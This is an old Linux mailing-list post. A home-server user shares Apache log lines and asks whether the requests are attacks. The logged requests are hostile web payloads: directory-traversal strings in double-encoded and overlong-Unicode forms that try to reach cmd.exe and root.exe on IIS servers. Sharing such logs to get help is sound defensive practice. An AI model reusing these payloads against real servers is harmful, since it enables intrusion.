[gentoo-user] trying to be hacked?

[Aaron Walker]

A week or so ago, I setup my cable router/firewall to forward port 80 to 
one of my machines so I could run Apache.  Last night while at work, I 
checked to see if it worked, and it did.  So just now, I went to check 
out the access_log and noticed some funny looking stuff, that doesnt 
look like normal activity....

<snipped from /var/log/apache2/access_log>

218.145.25.11 - - [28/Dec/2003:19:40:17 -0500] "GET 
/scripts/nsiislog.dll HTTP/1.0" 404 286 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:40 -0500] "GET 
/scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET 
/MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET 
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 321 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 321 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 337 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 
"-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
221.13.152.198 - - [30/Dec/2003:04:58:50 -0500] "get 
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir" 
501 336 "-" "-"

is this someone trying to exploit apache?

Thanks,
Aaron
--
/usr/bin/fortune says:
A woman did what a woman had to, the best way she knew how.
To do more was impossible, to do less, unthinkable.
                -- Dirisha, "The Man Who Never Missed"
--
[EMAIL PROTECTED] mailing list